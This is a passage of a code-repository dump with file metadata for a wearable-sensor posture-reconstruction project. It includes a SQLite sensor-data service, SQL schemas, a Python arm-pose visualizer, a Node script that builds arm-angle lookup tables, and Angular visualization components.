THREE.Vector3(distance, 0, 0), new THREE.Vector3(0, distance, 0), new THREE.Vector3(0, 0, distance)];\n const objects = [this.axisXName, this.axisYName, this.axisZName];\n for (let i = 0; i < objects.length; i++) {\n const position = this.toXYCoords(vectors[i]);\n objects[i].style.top = position.y + 'px';\n objects[i].style.left = position.x + 'px';\n }\n }\n\n}\n"
},
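`turnCamera()` above places the orbit camera on a sphere of radius 1000 around the origin using two angles, `cameraPos.x` (yaw) and `cameraPos.y` (pitch), then points it at the origin. A standalone sketch of that spherical-coordinate placement; the radius and initial angles are taken from the component.

```js
// Orbit-camera placement: yaw ax and pitch ay on a sphere of radius R,
// matching the trigonometry in turnCamera().
const R = 1000
function orbitPosition (ax, ay) {
  return {
    x: Math.sin(ax) * R * Math.cos(ay),
    y: Math.sin(ay) * R,
    z: Math.cos(ax) * R * Math.cos(ay)
  }
}

// Initial view used by the component: cameraPos = {x: 0.425, y: 0.595}.
console.log(orbitPosition(0.425, 0.595))
```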
{
"alpha_fraction": 0.6948728561401367,
"alphanum_fraction": 0.7102959752082825,
"avg_line_length": 44.26415252685547,
"blob_id": "72397ab7a7897a6e3ede674b1a470154fe60ad7b",
"content_id": "11eaa2c907c4fc32beafc6adce73c39beb7a35d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2399,
"license_type": "no_license",
"max_line_length": 235,
"num_lines": 53,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/prev_db_service/db_service_better_sqlite3_promise.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst Database = require('better-sqlite3')\nconst Promise = require('bluebird')\nconst db = new Database('./userActivityData.db')\nconst fs = require('fs')\nvar dbInit = fs.readFileSync('./dbInit.sql')\ndb.exec(dbInit.toString())\nvar dbPromise = Promise.resolve()\n// .then(() => {\n\n// })\n\nvar insertSensorData100HzStatement = db.prepare(`INSERT INTO SensorData100Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, lacc_x, lacc_y, lacc_z, acc_x, acc_y, acc_z)\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`)\nvar insertSensorData20HzStatement = db.prepare(`INSERT INTO SensorData20Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, mag_x, mag_y, mag_z)\n VALUES(?, ?, ?, ?, ?, ?, ?)`)\nvar insertSensorData1HzStatement = db.prepare(`INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp)\n VALUES(?, ?, ?, ?, ?)`)\nvar insertHealthStatement = db.prepare(`INSERT INTO SensorFreq(server_id, sensor_id, server_timestamp, frequency)\n VALUES(?, ?, ?, ?)`)\n\nfunction insertSensorData100Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(() => {\n insertSensorData100HzStatement\n .run([serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z])\n })\n}\nfunction insertSensorData20Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(() => {\n insertSensorData20HzStatement\n .run([serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z])\n })\n}\n\nfunction insertSensorData1Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(() => {\n insertSensorData1HzStatement\n .run([serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp])\n })\n}\nfunction insertHealth (serverId, sensorId, serverTimestamp, freq) {\n dbPromise = dbPromise.then(() => {\n insertHealthStatement\n .run([serverId, sensorId, serverTimestamp, freq])\n })\n}\n\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorData1Hz: insertSensorData1Hz,\n insertHealth: insertHealth\n}\n"
},
{
"alpha_fraction": 0.5984126925468445,
"alphanum_fraction": 0.5984126925468445,
"avg_line_length": 30.549999237060547,
"blob_id": "c46acd2ea6f6d30e3651a7b438be9a814749d356",
"content_id": "8e386d37d22b38ea71e22015eeab89522ddd2359",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 630,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 20,
"path": "/oriTrakHAR-master/dataProcessing/initClusteringResult.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS ClusteringName (\n id INTEGER PRIMARY KEY,\n name TEXT UNIQUE\n);\n\nCREATE TABLE IF NOT EXISTS ClusterLabel(\n\tcluster_id INTEGER NOT NULL,\n\tcluster INTEGER NOT NULL,\n\tlabel TEXT NOT NULL\n);\n\nCREATE TABLE IF NOT EXISTS ClusteringData(\n\tcluster_id INTEGER NOT NULL,\n\ttimestamp REAL NOT NULL,\n\tlocation_latitude REAL,\n\tlocation_longitude REAL,\n\tcluster INTEGER NOT NULL,\n\tFOREIGN KEY (cluster_id) REFERENCES ClusteringName(id),\n\tPRIMARY KEY (cluster_id, timestamp)\n);"
},
{
"alpha_fraction": 0.5848332047462463,
"alphanum_fraction": 0.6237100958824158,
"avg_line_length": 40.65999984741211,
"blob_id": "c36192dd2d0e36ac88e402c4c8a1df4e8e4679d2",
"content_id": "28926031b7350ebbd8a79f1bc756bd71fed4d9e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4167,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 100,
"path": "/python-code/visualization.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#euler_order: roll, pitch, yaw\n#original euler_order: yaw pitch roll\n#euler_order in oriTrakHAR: roll yaw pitch \nimport numpy as np\nimport math\nimport time\nfrom pyquaternion import Quaternion\nimport transformations\nimport json\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nANGLE_MAP_L = json.load(open('leftDict_yzx.json', 'r'))\nANGLE_MAP_R = json.load(open('rightDict_yzx.json', 'r'))\nplt.ion()\nfig = plt.figure()\nax = fig.gca(projection='3d')\nt = np.linspace(0, 60, 120)\n\n\nfrom processData import processRow\ninterpolatedData = processRow(['test.csv', 'test2.csv', 'test3.csv', 'test4.csv'], t)\n\n#from processStream import processRow\n#interpolatedData = processRow(['pipe1', 'pipe2','pipe3','pipe4'], t)\n\ndef updateRealtimeVis(quat, idStr, ax):\n if idStr == 'head':\n headPos = quat.rotate([0, 0, 1])\n ind = np.linspace(0,1,11)\n x = [headPos[0]*i for i in ind]\n y = [headPos[1]*i for i in ind]\n z = [headPos[2]*i for i in ind]\n ax.plot(x, y, z)\n return quat\n\n euler = transformations.euler_from_quaternion([quat[1], quat[2], quat[3], quat[0]])\n print(euler)\n if idStr == 'rightArm':\n ans = ANGLE_MAP_R[str(rad2Bucket(euler[2]))][str(rad2Bucket(euler[1]))][str(rad2Bucket(euler[0]))]\n if ans['shoulderX'] is not None:\n elbowRelativeEuler = [deg2rad(ans['shoulderX']), deg2rad(ans['shoulderZ']), deg2rad(ans['shoulderY'])]\n elbowRelativeQuat = transformations.quaternion_from_euler(elbowRelativeEuler[0], elbowRelativeEuler[1], elbowRelativeEuler[2])\n elbowRelativeQuat = Quaternion(elbowRelativeQuat[3], elbowRelativeQuat[0], elbowRelativeQuat[1], elbowRelativeQuat[2])\n elbowPos = elbowRelativeQuat.rotate([0, 0, -1])\n wristRelativePos = quat.rotate([0, 0, -1])\n ind = np.linspace(0,1,11)\n x = [0+elbowPos[0]*i for i in ind] + [0+elbowPos[0]+wristRelativePos[0]*i for i in ind]\n y = [-1+elbowPos[1]*i for i in ind] + [-1+elbowPos[1]+wristRelativePos[1]*i for i in ind]\n z = [0+elbowPos[2]*i for i in ind] + [0+elbowPos[2]+wristRelativePos[2]*i for i in ind]\n ax.plot(x, y, z)\n return elbowRelativeQuat\n \n if idStr == 'leftArm':\n #print(euler)\n ans = ANGLE_MAP_L[str(rad2Bucket(euler[0]))][str(rad2Bucket(euler[2]))][str(rad2Bucket(euler[1]))]\n #print(ans)\n if ans['shoulderX'] is not None:\n elbowRelativeEuler = [deg2rad(ans['shoulderX']), deg2rad(ans['shoulderZ']), deg2rad(ans['shoulderY'])]\n elbowRelativeQuat = transformations.quaternion_from_euler(elbowRelativeEuler[0], elbowRelativeEuler[1], elbowRelativeEuler[2])\n elbowRelativeQuat = Quaternion(elbowRelativeQuat[3], elbowRelativeQuat[0], elbowRelativeQuat[1], elbowRelativeQuat[2])\n elbowPos = elbowRelativeQuat.rotate([0, 0, -1])\n wristRelativePos = quat.rotate([0, 0, -1])\n ind = np.linspace(0,1,11)\n x = [0+elbowPos[0]*i for i in ind] + [0+elbowPos[0]+wristRelativePos[0]*i for i in ind]\n y = [1+elbowPos[1]*i for i in ind] + [1+elbowPos[1]+wristRelativePos[1]*i for i in ind]\n z = [0+elbowPos[2]*i for i in ind] + [0+elbowPos[2]+wristRelativePos[2]*i for i in ind]\n ax.plot(x, y, z)\n return elbowRelativeQuat\n\ndef rad2Bucket(rad):\n radInterval = 5*3.1415926/180\n ans = math.floor(rad / radInterval) * 5\n if ans == 180:\n return 180 - 5\n else:\n return ans\n\ndef deg2rad(deg): \n return deg * 3.1415926 / 180\n\nfor i in t:\n quatHead, quatLeft, quatRight, _, _, _ = next(interpolatedData)\n #print(quatLeft[0], quatLeft[1], quatLeft[2], quatLeft[3])\n ax.clear()\n ind = np.linspace(0, 1, 11)\n x = [0 for i in ind]\n y = [-1+2*i for i in ind]\n z = [0 for i in ind]\n ax.plot(x, 
y, z)\n x = [0 for i in ind]\n y = [0 for i in ind]\n z = [-2+2*i for i in ind]\n ax.plot(x, y, z)\n updateRealtimeVis(quatHead, 'head', ax)\n updateRealtimeVis(quatLeft, 'leftArm', ax)\n updateRealtimeVis(quatRight, 'rightArm', ax)\n plt.axis('equal')\n plt.show()\n plt.pause(2)\n\n"
},
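Both this Python lookup and the JavaScript map builder below quantize angles with the same `rad2Bucket` rule: floor the angle into `ANSWER_INTERVAL`-degree buckets and fold the +180° edge into the last bucket. A small check of that bucketing, written in JavaScript to match the server-side implementations; the sample angles are illustrative.

```js
// rad2Bucket as used on the server side: floor an angle (radians) into
// 5-degree buckets, clamping the top edge so 180 maps into the 175 bucket.
const ANSWER_INTERVAL = 5
const deg2rad = deg => deg * Math.PI / 180

function rad2Bucket (rad) {
  const ans = Math.floor(rad / deg2rad(ANSWER_INTERVAL)) * ANSWER_INTERVAL
  return ans === 180 ? 180 - ANSWER_INTERVAL : ans
}

console.log(rad2Bucket(deg2rad(42.3)))  // 40
console.log(rad2Bucket(deg2rad(-42.3))) // -45 (floor rounds toward -infinity)
console.log(rad2Bucket(deg2rad(180)))   // 175 (top edge folded into last bucket)
```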
{
"alpha_fraction": 0.5711590051651001,
"alphanum_fraction": 0.5933513045310974,
"avg_line_length": 34.336509704589844,
"blob_id": "1e30b57ce1b97578db1263ae7724d2068570d70b",
"content_id": "a52457109df64958148571fcfdb65601c1092644",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 11130,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 315,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/betterAngleMap.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst THREE = require('three.js-node')\nconst INTERVAL = 5\nconst ANSWER_INTERVAL = INTERVAL\nconst EULER_ORDER = 'YZX'\nconst fs = require('fs')\nconst cluster = require('cluster')\nconst numCPUs = require('os').cpus().length * 4\nconst RIGHT_SHOULDER_Y = { MIN: -100, MAX: 40 }\nconst RIGHT_SHOULDER_Z = { MIN: -85, MAX: 70 }\nconst RIGHT_SHOULDER_X = { MIN: -30, MAX: 120 }\nconst RIGHT_ELBOW_Y = { MIN: 0, MAX: 150 }\nconst RIGHT_ELBOW_X = { MIN: -20, MAX: 100 }\nconst LEFT_SHOULDER_Y = { MIN: -40, MAX: 100 }\nconst LEFT_SHOULDER_Z = { MIN: -85, MAX: 70 }\nconst LEFT_SHOULDER_X = { MIN: -120, MAX: 30 }\nconst LEFT_ELBOW_Y = { MIN: -150, MAX: 0 }\nconst LEFT_ELBOW_X = { MIN: -100, MAX: 20 }\nconst DICT_Y = { MIN: -180, MAX: 180 }\nconst DICT_Z = { MIN: -180, MAX: 180 }\nconst DICT_X = { MIN: -180, MAX: 180 }\n\nfunction deg2rad (deg) {\n return deg * Math.PI / 180\n}\nfunction rad2Bucket (rad) {\n var ans = Math.floor(rad / deg2rad(ANSWER_INTERVAL)) * ANSWER_INTERVAL\n return ans === 180 ? 180 - ANSWER_INTERVAL : ans\n}\nfunction EulerToQuat (x, y, z) {\n var vectorEuler = new THREE.Euler(deg2rad(x), deg2rad(y), deg2rad(z), EULER_ORDER)\n return new THREE.Quaternion().setFromEuler(vectorEuler)\n}\n\nfunction masterProcess() {\n var workers = {}\n console.log(`Master ${process.pid} is running`)\n var rightArmIter = angleGenerator(RIGHT_SHOULDER_Y, RIGHT_SHOULDER_Z, RIGHT_SHOULDER_X, RIGHT_ELBOW_Y, RIGHT_ELBOW_X, INTERVAL)\n var rightDict = makeDict()\n var leftArmIter = angleGenerator(LEFT_SHOULDER_Y, LEFT_SHOULDER_Z, LEFT_SHOULDER_X, LEFT_ELBOW_Y, LEFT_ELBOW_X, INTERVAL)\n var leftDict = makeDict()\n var finishedRightCoreCount = 0;\n function handleWorkerMsg(msg) {\n switch(msg.event) {\n case 'ready':\n workers[msg.id].send({event:'right_job', params: rightArmIter.next().value})\n break\n case 'ans_right':\n if (msg.ans) {\n rightDict[msg.ans.bucket.y][msg.ans.bucket.z][msg.ans.bucket.x].push(msg.ans.val)\n }\n var rightArm = rightArmIter.next()\n if (rightArm.done) {\n console.log('one process finished rightArm')\n finishedRightCoreCount++\n leftArm = leftArmIter.next()\n workers[msg.id].send({event:'left_job', params: leftArm.value})\n if (finishedRightCoreCount === (numCPUs - 1)) {\n console.log('Finished building right dictionary')\n exportFile(rightDict, './rightDict_yzx.json')\n }\n } else {\n workers[msg.id].send({event:'right_job', params: rightArm.value})\n }\n break\n case 'ans_left':\n if (msg.ans) {\n leftDict[msg.ans.bucket.y][msg.ans.bucket.z][msg.ans.bucket.x].push(msg.ans.val)\n }\n var leftArm = leftArmIter.next()\n if (leftArm.done) {\n workers[msg.id].send({event: 'fin'})\n delete workers[msg.id]\n if (Object.keys(workers).length === 0) {\n console.log('Finished building left dictionary')\n exportFile(leftDict, './leftDict_yzx.json')\n }\n } else {\n workers[msg.id].send({event:'left_job', params: leftArm.value})\n }\n break\n }\n }\n\n function* angleGenerator(shoulderYRange, shoulderZRange, shoulderXRange, elbowYRange, elbowXRange, interval) {\n for (let shoulderY = shoulderYRange.MIN; shoulderY < shoulderYRange.MAX; shoulderY += interval) {\n for (let shoulderZ = shoulderZRange.MIN; shoulderZ < shoulderZRange.MAX; shoulderZ += interval) {\n for (let shoulderX = shoulderXRange.MIN; shoulderX < shoulderXRange.MAX; shoulderX += interval) {\n for (let elbowY = elbowYRange.MIN; elbowY < elbowYRange.MAX; elbowY += interval) {\n for (let elbowX = elbowXRange.MIN; elbowX < elbowXRange.MAX; elbowX += interval) {\n yield {shoulderY, shoulderZ, shoulderX, 
elbowY, elbowX}\n }\n }\n }\n }\n }\n }\n\n function makeDict() {\n var answerBuckets = {}\n for (let y = DICT_Y.MIN; y < DICT_Y.MAX; y += ANSWER_INTERVAL) {\n answerBuckets[y] = {}\n for (let z = DICT_Z.MIN; z < DICT_Z.MAX; z += ANSWER_INTERVAL) {\n answerBuckets[y][z] = {}\n for (let x = DICT_X.MIN; x < DICT_X.MAX; x += ANSWER_INTERVAL) {\n answerBuckets[y][z][x] = []\n }\n }\n }\n return answerBuckets\n }\n\n function exportFile(answerBuckets, fileName) {\n var finalDictionaryYZX = {}\n for (let y = DICT_Y.MIN; y < DICT_Y.MAX; y += ANSWER_INTERVAL) {\n finalDictionaryYZX[y] = {}\n for (let z = DICT_Z.MIN; z < DICT_Z.MAX; z += ANSWER_INTERVAL) {\n finalDictionaryYZX[y][z] = {}\n for (let x = DICT_X.MIN; x < DICT_X.MAX; x += ANSWER_INTERVAL) {\n let length = answerBuckets[y][z][x].length\n if (length > 0) {\n let shoulderXSum = 0\n let shoulderYSum = 0\n let shoulderZSum = 0\n let elbowYSum = 0\n let elbowXSum = 0\n answerBuckets[y][z][x].forEach(e => {\n shoulderXSum += e.shoulderX\n shoulderYSum += e.shoulderY\n shoulderZSum += e.shoulderZ\n elbowYSum += e.elbowY\n elbowXSum += e.elbowX\n })\n finalDictionaryYZX[y][z][x] = {\n shoulderX: shoulderXSum / length,\n shoulderY: shoulderYSum / length,\n shoulderZ: shoulderZSum / length,\n elbowY: elbowYSum / length,\n elbowX: elbowXSum / length\n }\n } else {\n finalDictionaryYZX[y][z][x] = {\n shoulderX: null,\n shoulderY: null,\n shoulderZ: null,\n elbowY: null,\n elbowX: null\n }\n }\n }\n }\n }\n fs.writeFile(fileName, JSON.stringify(finalDictionaryYZX), () => {\n console.log(`${fileName} write finished!`)\n })\n }\n\n for (let i = 1; i < numCPUs; i++) {\n console.log(`Forking process number ${i}...`)\n var worker = cluster.fork()\n workers[worker.process.pid] = worker\n worker.on('message', handleWorkerMsg)\n }\n}\n\nfunction childProcess() {\n process.on('message', handleMasterMsg)\n function handleMasterMsg(msg) {\n switch (msg.event) {\n case 'right_job':\n var entry = processRightData(msg.params)\n process.send({event:'ans_right', id: process.pid, ans: entry})\n break\n\n case 'left_job':\n var entry = processLeftData(msg.params)\n process.send({event:'ans_left', id: process.pid, ans: entry})\n break\n\n case 'fin':\n process.exit()\n break\n }\n }\n\n function processRightData(params) {\n let rightShoulder = (new THREE.Vector3(0, 0, 20))\n let rightElbow = new THREE.Vector3(28, 0, 0)\n let rightWrist = new THREE.Vector3(28, 0, 0)\n\n let upperArm = EulerToQuat(params.shoulderX, params.shoulderY, params.shoulderZ)\n let lowerArm = EulerToQuat(params.elbowX, params.elbowY, 0)\n\n rightWrist.applyQuaternion(lowerArm)\n rightElbow.applyQuaternion(upperArm)\n\n var rightWristHalf = rightWrist.clone()\n var rightElbowPos = rightElbow.clone()\n // Check if elbow is in torso/head\n rightElbowPos = rightElbowPos.add(rightShoulder)\n if (rightElbowPos.y < 0) {\n if ((rightElbowPos.z > -20) && (rightElbowPos.z < 20) && (rightElbowPos.x > -10) && (rightElbowPos.x < 10)) {\n return null\n }\n } else if (rightElbowPos.y < 20){\n if ((rightElbowPos.z > -10) && (rightElbowPos.z < 10) && (rightElbowPos.x > -10) && (rightElbowPos.x < 10)) {\n return null\n }\n }\n\n // Check if wrist is in torso/head\n rightWrist.add(rightElbow).add(rightShoulder)\n if (rightWrist.y < 0) {\n if ((rightWrist.z > -20) && (rightWrist.z < 20) && (rightWrist.x > -10) && (rightWrist.x < 10)) {\n return null\n }\n } else if (rightWrist.y < 20){\n if ((rightWrist.z > -10) && (rightWrist.z < 10) && (rightWrist.x > -10) && (rightWrist.x < 10)) {\n return null\n }\n }\n // 
Check if upper arm is in torso/head\n rightWristHalf.multiplyScalar(0.5)\n rightWristHalf.add(rightElbow).add(rightShoulder)\n if (rightWristHalf.y < 0) {\n if ((rightWristHalf.z > -20) && (rightWristHalf.z < 20) && (rightWristHalf.x > -10) && (rightWristHalf.x < 10)) {\n return null\n }\n } else if (rightWristHalf.y < 20){\n if ((rightWristHalf.z > -10) && (rightWristHalf.z < 10) && (rightWristHalf.x > -10) && (rightWristHalf.x < 10)) {\n return null\n }\n }\n\n let finalQuat = new THREE.Quaternion().multiplyQuaternions(lowerArm, upperArm)\n let finalEuler = new THREE.Euler().setFromQuaternion(finalQuat, EULER_ORDER)\n return {\n bucket: {\n y: rad2Bucket(finalEuler._y),\n z: rad2Bucket(finalEuler._z),\n x: rad2Bucket(finalEuler._x)\n },\n val: params\n }\n }\n\n function processLeftData(params) {\n let leftShoulder = (new THREE.Vector3(0, 0, -20))\n let leftElbow = new THREE.Vector3(28, 0, 0)\n let leftWrist = new THREE.Vector3(28, 0, 0)\n\n let upperArm = EulerToQuat(params.shoulderX, params.shoulderY, params.shoulderZ)\n let lowerArm = EulerToQuat(params.elbowX, params.elbowY, 0)\n\n leftWrist.applyQuaternion(lowerArm)\n leftElbow.applyQuaternion(upperArm)\n\n var leftWristHalf = leftWrist.clone()\n var leftElbowPos = leftElbow.clone()\n // Check if elbow is in torso/head\n leftElbowPos = leftElbowPos.add(leftShoulder)\n if (leftElbowPos.y < 0) {\n if ((leftElbowPos.z > -20) && (leftElbowPos.z < 20) && (leftElbowPos.x > -10) && (leftElbowPos.x < 10)) {\n return null\n }\n } else if (leftElbowPos.y < 20){\n if ((leftElbowPos.z > -10) && (leftElbowPos.z < 10) && (leftElbowPos.x > -10) && (leftElbowPos.x < 10)) {\n return null\n }\n }\n\n // Check if wrist is in torso/head\n leftWrist.add(leftElbow).add(leftShoulder)\n if (leftWrist.y < 0) {\n if ((leftWrist.z > -20) && (leftWrist.z < 20) && (leftWrist.x > -10) && (leftWrist.x < 10)) {\n return null\n }\n } else if (leftWrist.y < 20){\n if ((leftWrist.z > -10) && (leftWrist.z < 10) && (leftWrist.x > -10) && (leftWrist.x < 10)) {\n return null\n }\n }\n // Check if upper arm is in torso/head\n leftWristHalf.multiplyScalar(0.5)\n leftWristHalf.add(leftElbow).add(leftShoulder)\n if (leftWristHalf.y < 0) {\n if ((leftWristHalf.z > -20) && (leftWristHalf.z < 20) && (leftWristHalf.x > -10) && (leftWristHalf.x < 10)) {\n return null\n }\n } else if (leftWristHalf.y < 20){\n if ((leftWristHalf.z > -10) && (leftWristHalf.z < 10) && (leftWristHalf.x > -10) && (leftWristHalf.x < 10)) {\n return null\n }\n }\n\n let finalQuat = new THREE.Quaternion().multiplyQuaternions(lowerArm, upperArm)\n let finalEuler = new THREE.Euler().setFromQuaternion(finalQuat, EULER_ORDER)\n return {\n bucket: {\n y: rad2Bucket(finalEuler._y),\n z: rad2Bucket(finalEuler._z),\n x: rad2Bucket(finalEuler._x)\n },\n val: params\n }\n }\n\n process.send({event:'ready', id: process.pid})\n}\n\nif (cluster.isMaster) {\n masterProcess()\n} else {\n childProcess()\n}"
},
{
"alpha_fraction": 0.5630354881286621,
"alphanum_fraction": 0.6150550842285156,
"avg_line_length": 24.936508178710938,
"blob_id": "e9e82328ee3e807d830776d66e954be7d9981f7f",
"content_id": "676fee2d492a6ad9421ac91702f963a2c2016e39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1634,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 63,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/middle-map/middle-map.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\n\n@Component({\n selector: 'app-middle-map',\n templateUrl: './middle-map.component.html',\n styleUrls: ['./middle-map.component.css']\n})\nexport class MiddleMapComponent implements OnInit {\n public status;\n // public points = [{x: -84.396, y: 33.775}, {x: -84.3962, y: 33.7756}];\n // public clusters = {\n // cluster1: {\n // points: [{x: -84.396, y: 33.775}, {x: -84.3962, y: 33.7756}],\n // color: '#3399CC'\n // },\n // cluster2: {\n // points: [{x: -84.391, y: 33.29}, {x: -84.3962, y: 33.7756}, {x: -84.4, y: 33.8}],\n // color: '#CC9933'\n // }\n // };\n public mapUpdateObservable: Observable<any> = this.dataModel.getNewMapUpdate()\n public colorPalette;\n public clusterPoints = {}\n\n\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n this.colorPalette = dataModel.colorPalette;\n this.mapUpdateObservable.subscribe(msg => {\n this.clusterPoints = {}\n setTimeout((() => {\n this.clusterPoints = msg\n }).bind(this), 0)\n })\n }\n\n deepcopy(obj) {\n return JSON.parse(JSON.stringify(obj));\n }\n\n ngOnInit() {\n }\n\n getKeys(obj) {\n return Object.keys(obj);\n }\n\n onPointClick(p) {\n console.log(p);\n }\n\n getColor(clusterKey, alpha) {\n var color = this.deepcopy(this.dataModel.colorPalette[clusterKey])//.map(d => d/255)\n color.push(alpha)\n return color\n }\n\n\n\n}\n"
},
{
"alpha_fraction": 0.6695278882980347,
"alphanum_fraction": 0.716738224029541,
"avg_line_length": 32.42856979370117,
"blob_id": "0094d0a3bdba7e7aa1ae833fa75995ef93a7ce80",
"content_id": "3f3739a35cabb419ae60a8fa5569302488df8ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 7,
"path": "/oriTrakHAR-master/rawDataVisServer/config.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "module.exports = {\n\tSOCKET_IO_PORT: 8088,\n\tDB_FOLDER: '/Users/zhaoyuhui/OriTrak_data',\n CLUSTER_DB_PATH: '/Users/zhaoyuhui/OriTrak_data/03_29_18_data/cluster.db',\n\t// DB_FOLDER: '/Users/zhaoyuhui/OriTrak_data',\n\tANSWER_INTERVAL: 5\n}"
},
{
"alpha_fraction": 0.6834094524383545,
"alphanum_fraction": 0.6834094524383545,
"avg_line_length": 25.280000686645508,
"blob_id": "df9d672a2f38a9842d76fbbd33bf1cecf8e72c89",
"content_id": "a0ffa9c4c6acb30dad5bface7b12a02ddf40817d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 657,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 25,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/shpere-hist/shpere-hist.component.spec.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { async, ComponentFixture, TestBed } from '@angular/core/testing';\n\nimport { ShpereHistComponent } from './shpere-hist.component';\n\ndescribe('ShpereHistComponent', () => {\n let component: ShpereHistComponent;\n let fixture: ComponentFixture<ShpereHistComponent>;\n\n beforeEach(async(() => {\n TestBed.configureTestingModule({\n declarations: [ ShpereHistComponent ]\n })\n .compileComponents();\n }));\n\n beforeEach(() => {\n fixture = TestBed.createComponent(ShpereHistComponent);\n component = fixture.componentInstance;\n fixture.detectChanges();\n });\n\n it('should create', () => {\n expect(component).toBeTruthy();\n });\n});\n"
},
{
"alpha_fraction": 0.8461538553237915,
"alphanum_fraction": 0.8461538553237915,
"avg_line_length": 25,
"blob_id": "1783842a30451014c83ed5947ddaf53ed848043d",
"content_id": "fa411feeaebe100b257ff5b6f68445ba47025350",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 2,
"path": "/oriTrakHAR-master/README.md",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "# oriTrakHAR\noriTrak for human activity recognition\n"
},
{
"alpha_fraction": 0.6222032308578491,
"alphanum_fraction": 0.6531170010566711,
"avg_line_length": 34.70121765136719,
"blob_id": "dd8427b155cde6c69a0f5f17ecf522169f183dc1",
"content_id": "282c75ab9a050ea12c8e48891fef86ab0a1071ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 5855,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 164,
"path": "/oriTrakHAR-master/rawDataVis/src/app/services/data-model.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { Subject } from 'rxjs/Subject';\nimport { Observable } from 'rxjs/Observable';\n\n@Injectable()\nexport class DataModelService {\n dummyDate = new Date();\n public status = {\n torso : {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n head: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n rightUpper: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n rightLower: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n leftUpper: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n leftLower: {\n quaternion: {w: 0, x: 0, y: 0, z: 0}\n },\n availableDates: {},\n availableClusters: {},\n selectedCluster: '',\n playing: false,\n playingTime: undefined,\n timeMin: this.dummyDate,\n timeMax: this.dummyDate,\n selectedTimeStart: this.dummyDate,\n selectedTimeEnd: this.dummyDate,\n animationStartTime: this.dummyDate,\n animationEndTime: this.dummyDate,\n histStartTime: this.dummyDate,\n histEndTime: this.dummyDate,\n selectedDate: '',\n selectedHistSource: 'Right Relative',\n availableHistSources: ['Right Relative', 'Left Relative', 'Head Relative', 'Torso Orient'],\n windowFixed: false,\n winPlaying: false,\n windowWidth: 60000,\n start_selected_end: [1, 2, 3, 5],\n windowPlaySlowDownFactor: 1,\n availableWindowPlaySlowDownFactors : [1, 1.5, 2, 2.5, 3],\n curDisplayClusterData: {},\n histMenuDisplayName: {\n 'Right Relative': 'Right Arm Orientation Relative to Torso',\n 'Left Relative': 'Left Arm Orientation Relative to Torso',\n 'Head Relative': 'Head Orientation Relative to Torso',\n 'Torso Orient': 'Torso Absolute Orientation'\n },\n 